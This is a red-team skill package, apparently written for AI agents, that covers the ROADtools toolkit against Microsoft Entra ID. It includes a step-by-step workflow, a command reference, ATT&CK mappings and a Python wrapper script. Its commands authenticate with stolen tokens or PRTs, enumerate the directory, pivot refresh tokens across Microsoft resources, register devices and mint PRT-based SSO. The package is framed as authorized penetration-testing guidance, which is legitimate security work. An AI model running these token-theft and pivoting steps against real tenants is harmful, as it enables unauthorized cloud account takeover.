npx skills add mukul975/Anthropic-Cybersecurity-SkillsAuthorized use only: ROADtools interacts with live Microsoft Entra ID (Azure AD) tenants and can register devices, mint and exchange tokens, and enumerate directory objects. Use it solely against tenants you own or are explicitly authorized in writing to test. Unauthorized access to a cloud tenant is illegal.
Overview
ROADtools (by Dirk-jan Mollema) is the de facto offensive toolkit for Microsoft Entra ID. It has two main components:
- ROADrecon — authenticates to Entra ID, gathers the full directory into a local SQLite database via the Azure AD Graph API, and serves an Angular GUI to explore users, groups, roles, applications, service principals, conditional-access policies, and device objects offline. A plugin system exports to BloodHound and analyzes CA policies.
- roadtx (ROADtools Token eXchange) — acquires and exchanges Entra-issued tokens across the many OAuth flows (ROPC, device code, auth-code, refresh-token exchange, app/federated app), performs device registration, and handles Primary Refresh Token (PRT) operations including PRT-based SSO and cookie minting. Its FOCI (Family of Client IDs) awareness lets a refresh token for one first-party client be redeemed for another resource.
Together they cover the Discovery phase against cloud identity: enumerate the tenant (T1087.004 Account Discovery: Cloud Account) and obtain/manipulate the tokens needed to reach Microsoft Graph, Azure Resource Manager, and other resources. ROADrecon's offline database makes recon stealthy and fast; roadtx makes token theft, PRT abuse, and cross-resource pivoting practical.
When to Use
- During an authorized Azure / Entra ID red-team or cloud penetration test.
- When you have a foothold credential, refresh token, or PRT and need to enumerate the tenant.
- When you must pivot a token from one resource (e.g., Azure CLI) to another (e.g., Microsoft Graph).
- When validating that conditional-access, device-compliance, and token controls actually constrain an attacker.
- When mapping Entra attack paths (export to BloodHound for graph analysis).
Prerequisites
- Written authorization and defined scope for the target tenant.
- A starting credential: username/password (no MFA flows), a device code session, a refresh/access token, or a registered device's PRT.
- Python 3.7+ (roadtx Selenium flows need a matching geckodriver/Firefox).
# Core install (roadlib is a shared dependency, pulled in automatically)
python -m pip install roadrecon
python -m pip install roadtx
# Verify
roadrecon --help
roadtx --helpObjectives
- Authenticate to Entra ID via the appropriate flow (device code preferred for MFA).
- Gather the full directory with ROADrecon and analyze it in the GUI.
- Export the directory to BloodHound and run CA-policy analysis plugins.
- Acquire tokens with roadtx and exchange refresh tokens across resources/clients.
- Demonstrate PRT-based SSO and document the resulting access.
MITRE ATT&CK Mapping
| ID | Tactic | Official Technique Name | Role in this skill |
|---|---|---|---|
| T1087.004 | Discovery | Account Discovery: Cloud Account | ROADrecon enumerates tenant users/accounts |
| T1069.003 | Discovery | Permission Groups Discovery: Cloud Groups | ROADrecon enumerates Entra groups and roles |
| T1538 | Discovery | Cloud Service Dashboard | GUI exploration of tenant configuration |
| T1550.001 | Defense Evasion / Lateral Movement | Use Alternate Authentication Material: Application Access Token | roadtx refresh-token exchange across resources |
| T1528 | Credential Access | Steal Application Access Token | roadtx PRT/token acquisition |
Workflow
Step 1: Authenticate with ROADrecon
Pick the flow that matches your foothold. Device code supports MFA; ROPC (-u/-p) does not.
# Username/password (legacy, no MFA)
roadrecon auth -u user@tenant.onmicrosoft.com -p 'Password123!'
# Device-code flow (supports MFA)
roadrecon auth --device-code
# From a stolen access or refresh token
roadrecon auth --access-token <JWT>
roadrecon auth --refresh-token <refresh_token>
# From a PRT (with session key) for SSO-grade access
roadrecon auth --prt <prt> --prt-sessionkey <session_key>Authentication writes .roadtools_auth in the working directory.
Step 2: Gather the directory
# Full gather into roadrecon.db (default)
roadrecon gather
# Include MFA/auth-method details (requires a privileged role)
roadrecon gather --mfaStep 3: Explore in the GUI
roadrecon gui
# Browse to http://127.0.0.1:5000 — users, groups, roles, applications,
# service principals, devices, and conditional-access policies, all offline.Step 4: Run analysis plugins
# Analyze conditional-access policies
roadrecon plugin policies -h
roadrecon plugin policies
# Export the gathered data to a BloodHound-importable format
roadrecon plugin bloodhound -h
roadrecon plugin bloodhoundStep 5: Acquire tokens with roadtx
# ROPC: get a Microsoft Graph token for the Azure CLI client
roadtx gettokens -u user@tenant.com -p 'Password123!' -c azcli -r msgraph
# Device-code style interactive auth for the Teams client to Graph
roadtx interactiveauth -c msteams -r msgraph
# From an existing refresh token
roadtx gettokens --refresh-token <refresh_token> -r msgraphTokens are written to .roadtools_auth (use --tokens-stdout to print).
Step 6: Exchange refresh tokens across resources (FOCI pivot)
A FOCI refresh token obtained for one first-party client can be redeemed for another resource without re-auth.
# Convert the stored refresh token to an Azure Resource Manager token
roadtx refreshtokento -r azrm
# Convert to a scoped Graph token via the Teams client
roadtx refreshtokento -c msteams -r msgraph
# Find which first-party clients hold a given scope
roadtx getscope -s https://graph.microsoft.com/mail.read --fociStep 7: Device registration and PRT-based SSO
# Register a (virtual) device to the tenant
roadtx device -n redteam-device
# Request a PRT using the device cert/key and user creds
roadtx prt -u user@tenant.com -p 'Password123!' --key-pem redteam-device.key --cert-pem redteam-device.pem
# Use the PRT to authenticate a client to a resource (SSO-grade)
roadtx prtauth -c msteams -r msgraph
# Enrich a PRT with an interactive MFA claim
roadtx prtenrich -u user@tenant.comStep 8: Inspect tokens
# Decode and print claims of the stored / a supplied token
roadtx describe -t <JWT>
roadtx describe < .roadtools_auth | jq .Tools and Resources
| Tool | Purpose | Primary Source |
|---|---|---|
| ROADtools (repo) | Toolkit overview + wiki | https://github.com/dirkjanm/ROADtools |
| ROADrecon wiki | Auth/gather/gui/plugin usage | https://github.com/dirkjanm/ROADtools/wiki/Getting-started-with-ROADrecon |
| roadtx wiki | Token exchange + PRT/device flows | https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx) |
| BloodHound CE | Graph analysis of exported Entra data | https://github.com/SpecterOps/BloodHound |
| Microsoft identity platform | Token/flow reference | https://learn.microsoft.com/entra/identity-platform/ |
Validation Criteria
- Authenticated to the target tenant via an authorized flow;
.roadtools_authcreated. - Directory gathered into
roadrecon.db(with--mfawhere role allows). - GUI explored; users, groups, roles, apps, CA policies reviewed.
- CA-policy and BloodHound plugins executed; data exported.
- Tokens acquired with roadtx for at least one resource.
- Refresh-token exchange to a second resource demonstrated (FOCI pivot).
- Device registered and PRT-based SSO demonstrated (where in scope).
- Token claims inspected with
roadtx describe. - Findings and access documented for the engagement report.
References and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 2
api-reference.md3.0 KB
ROADtools Command Reference
ROADrecon
| Command | Purpose | Key flags |
|---|---|---|
roadrecon auth |
Authenticate to Entra ID | -u user, -p password, --device-code, --access-token, --refresh-token, --prt, --prt-sessionkey, --prt-cookie, --prt-init |
roadrecon gather |
Gather directory into roadrecon.db | --mfa (needs privileged role) |
roadrecon gui |
Launch Angular GUI (http://127.0.0.1:5000) | — |
roadrecon plugin policies |
Analyze conditional-access policies | -f file, -p |
roadrecon plugin bloodhound |
Export to BloodHound format | — |
Auth state is stored in .roadtools_auth; directory data in roadrecon.db.
roadtx (ROADtools Token eXchange)
Token acquisition
| Command | Purpose | Key flags |
|---|---|---|
roadtx gettokens |
Acquire tokens (ROPC / refresh) | -u, -p, -c client, -r resource, -s scope, --refresh-token, --cae, --tokens-stdout |
roadtx interactiveauth |
Interactive (browser) auth | -u, -p, -c, -r, -ru redirect-url |
roadtx codeauth |
Exchange auth code for tokens | — |
roadtx refreshtokento |
Convert stored RT to another resource | -r, -s, -c |
roadtx appauth |
App (client-credential) auth | -c, -p secret, -t tenant, -r, -s, --cert-pem, --key-pem, --cert-pfx, --pfx-pass |
roadtx federatedappauth |
Federated app auth (workload identity) | -c, --cert-pem, --key-pem, --subject, -t, --issuer, -s, --kid |
Device + PRT
| Command | Purpose | Key flags |
|---|---|---|
roadtx device |
Register/delete a device | -n name, -a action, -c cert, -k key |
roadtx hybriddevice |
Register hybrid-joined device | — |
roadtx prt |
Request/renew a PRT | -u, -p, --key-pem, --cert-pem, -a action, -r refresh-token |
roadtx prtauth |
Auth a client using a PRT | -c, -r, -f prt-file, --prt, --prt-sessionkey, --tokens-stdout |
roadtx browserprtauth |
Browser auth using PRT | -url, -c, -r, -f |
roadtx browserprtinject |
Inject PRT compliance claims | -u, -r, -c |
roadtx prtenrich |
Add MFA claim to PRT | -u |
roadtx prtcookie |
Mint browser cookie from PRT | — |
Utility
| Command | Purpose | Key flags |
|---|---|---|
roadtx describe |
Decode token claims | -t token (or stdin) |
roadtx decrypt |
Decrypt JWE tokens | — |
roadtx getscope |
Find clients holding a scope | -s, --foci |
roadtx getotp |
Generate TOTP from a seed | <seed> |
roadtx listaliases |
List client/resource aliases | — |
roadtx keepassauth |
Selenium auth from KeePass | -c, -u, -kp, -kpp, -url, --keep-open |
roadtx sharepointlogin |
Authenticate to SharePoint/OneDrive | <token>, --host |
Common client (-c) and resource (-r) aliases
Clients: azcli, msteams, msgraph (as client where applicable), office, broker.
Resources: msgraph, azrm, aadgraph, devicereg. Use roadtx listaliases for the full list.
standards.md1.4 KB
Standards and Framework Mapping
NIST Cybersecurity Framework 2.0
| ID | Name | Rationale |
|---|---|---|
| ID.AM-03 | Representations of the organization's authorized network communication and internal/external network data flows are maintained | ROADrecon enumeration produces the directory/identity asset inventory that defenders must maintain and that attackers exploit; the engagement validates visibility of this asset surface. |
MITRE ATT&CK (Enterprise)
| ID | Name | Rationale |
|---|---|---|
| T1087.004 | Account Discovery: Cloud Account | ROADrecon enumerates Entra ID user/account objects. |
| T1069.003 | Permission Groups Discovery: Cloud Groups | ROADrecon enumerates Entra groups and directory roles. |
| T1538 | Cloud Service Dashboard | GUI exploration of tenant configuration and policies. |
| T1550.001 | Use Alternate Authentication Material: Application Access Token | roadtx refresh-token exchange across resources (FOCI). |
| T1528 | Steal Application Access Token | roadtx token/PRT acquisition. |
Reference standards
| Standard | Relevance |
|---|---|
| Microsoft identity platform (OAuth 2.0 / OIDC) | Defines the auth-code, ROPC, device-code, and refresh-token flows roadtx exercises. |
| FOCI (Family of Client IDs) | Microsoft first-party client family enabling cross-client refresh-token redemption. |
| Primary Refresh Token (PRT) | Device-bound SSO artifact abused via roadtx prt/prtauth. |
Scripts 1
agent.py4.8 KB
#!/usr/bin/env python3
"""ROADtools engagement orchestrator.
Authorized Entra ID assessment helper. Wraps the real roadrecon/roadtx binaries
to run an authenticated recon pass and a token-exchange pivot, then parses token
claims. Requires `roadrecon` and `roadtx` on PATH (pip install roadrecon roadtx).
Examples
--------
python agent.py recon --device-code --gather --bloodhound
python agent.py recon -u user@tenant.com -p 'Pass!' --gather
python agent.py tokens -u user@tenant.com -p 'Pass!' -c azcli -r msgraph
python agent.py pivot -r azrm # exchange stored RT to ARM
python agent.py describe # decode .roadtools_auth token
"""
import argparse
import json
import shutil
import subprocess
import sys
def require(binary):
if shutil.which(binary) is None:
sys.exit(f"[!] '{binary}' not found on PATH. Install with: pip install {binary}")
def run(cmd):
print("[>] " + " ".join(cmd), file=sys.stderr)
try:
proc = subprocess.run(cmd, capture_output=True, text=True)
except FileNotFoundError as exc:
sys.exit(f"[!] failed to execute {cmd[0]}: {exc}")
if proc.stdout:
print(proc.stdout)
if proc.returncode != 0:
print(proc.stderr, file=sys.stderr)
print(f"[!] {cmd[0]} exited {proc.returncode}", file=sys.stderr)
return proc.returncode, proc.stdout
def auth_args(args):
if args.device_code:
return ["--device-code"]
if args.access_token:
return ["--access-token", args.access_token]
if args.refresh_token:
return ["--refresh-token", args.refresh_token]
if args.user and args.password:
return ["-u", args.user, "-p", args.password]
sys.exit("[!] provide an auth method: --device-code | --access-token | --refresh-token | -u/-p")
def cmd_recon(args):
require("roadrecon")
rc, _ = run(["roadrecon", "auth"] + auth_args(args))
if rc != 0:
sys.exit("[!] authentication failed")
if args.gather:
gather = ["roadrecon", "gather"]
if args.mfa:
gather.append("--mfa")
run(gather)
if args.bloodhound:
run(["roadrecon", "plugin", "bloodhound"])
if args.policies:
run(["roadrecon", "plugin", "policies"])
print("[+] recon complete. Run 'roadrecon gui' to explore roadrecon.db", file=sys.stderr)
def cmd_tokens(args):
require("roadtx")
cmd = ["roadtx", "gettokens"]
if args.refresh_token:
cmd += ["--refresh-token", args.refresh_token]
elif args.user and args.password:
cmd += ["-u", args.user, "-p", args.password]
else:
sys.exit("[!] provide -u/-p or --refresh-token")
if args.client:
cmd += ["-c", args.client]
if args.resource:
cmd += ["-r", args.resource]
run(cmd)
def cmd_pivot(args):
require("roadtx")
cmd = ["roadtx", "refreshtokento", "-r", args.resource]
if args.client:
cmd += ["-c", args.client]
run(cmd)
def cmd_describe(args):
require("roadtx")
if args.token:
run(["roadtx", "describe", "-t", args.token])
else:
# roadtx describe reads .roadtools_auth from stdin
try:
with open(".roadtools_auth", "r", encoding="utf-8") as fh:
data = fh.read()
except FileNotFoundError:
sys.exit("[!] .roadtools_auth not found; authenticate first or pass --token")
proc = subprocess.run(["roadtx", "describe"], input=data, text=True,
capture_output=True)
print(proc.stdout or proc.stderr)
def main():
p = argparse.ArgumentParser(description="ROADtools engagement orchestrator (authorized use only)")
sub = p.add_subparsers(dest="cmd", required=True)
def add_auth(sp):
sp.add_argument("-u", "--user"); sp.add_argument("-p", "--password")
sp.add_argument("--device-code", action="store_true")
sp.add_argument("--access-token"); sp.add_argument("--refresh-token")
sr = sub.add_parser("recon"); add_auth(sr)
sr.add_argument("--gather", action="store_true")
sr.add_argument("--mfa", action="store_true")
sr.add_argument("--bloodhound", action="store_true")
sr.add_argument("--policies", action="store_true")
st = sub.add_parser("tokens")
st.add_argument("-u", "--user"); st.add_argument("-p", "--password")
st.add_argument("--refresh-token")
st.add_argument("-c", "--client", default="azcli")
st.add_argument("-r", "--resource", default="msgraph")
sp_ = sub.add_parser("pivot")
sp_.add_argument("-r", "--resource", required=True)
sp_.add_argument("-c", "--client")
sd = sub.add_parser("describe"); sd.add_argument("--token")
args = p.parse_args()
{"recon": cmd_recon, "tokens": cmd_tokens,
"pivot": cmd_pivot, "describe": cmd_describe}[args.cmd](args)
if __name__ == "__main__":
main()